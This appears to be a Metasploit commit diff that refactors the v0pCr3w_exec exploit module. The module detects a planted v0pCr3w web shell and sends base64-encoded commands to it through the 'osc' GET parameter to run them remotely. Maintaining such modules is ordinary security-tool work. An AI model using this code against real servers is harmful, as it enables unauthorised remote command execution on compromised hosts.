Updated v0pCr3w_exec to use send_request_cgi

Author: bwall

modules/exploits/multi/misc/v0pCr3w_exec.rb

@@ -53,21 +53,28 @@ def initialize(info={})
 	end
 
 	def check
-		uri = normalize_uri(datastore['URI'])
-		uri += "?lol=1"
-
-		shell = send_request_raw({'uri' => uri}, 25)
+		shell = send_request_cgi({
+		    'method'   => 'GET',
+		    'uri'      => normalize_uri(datastore['URI']),
+		    'vars_get' => {
+			'lol' => '1'
+		    }
+		})
 		if (shell and shell.body =~ /v0pCr3w\<br\>/ and shell.body =~ /\<br\>nob0dyCr3w/)
 			return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe
 	end
 
 	def http_send_command(cmd, opts = {})
-		p = Rex::Text.uri_encode(Rex::Text.encode_base64(cmd))
-		uri = normalize_uri(datastore['URI'])
-		uri += '?osc=' + p
-		res = send_request_raw({'uri' => uri}, 25)
+		p = Rex::Text.encode_base64(cmd)
+		res = send_request_cgi({
+		    'method'   => 'GET',
+		    'uri'      => normalize_uri(datastore['URI']),
+		    'vars_get' => {
+			'osc' => p
+		    }
+		})
 		if not (res and res.code == 200)
 			fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
 		end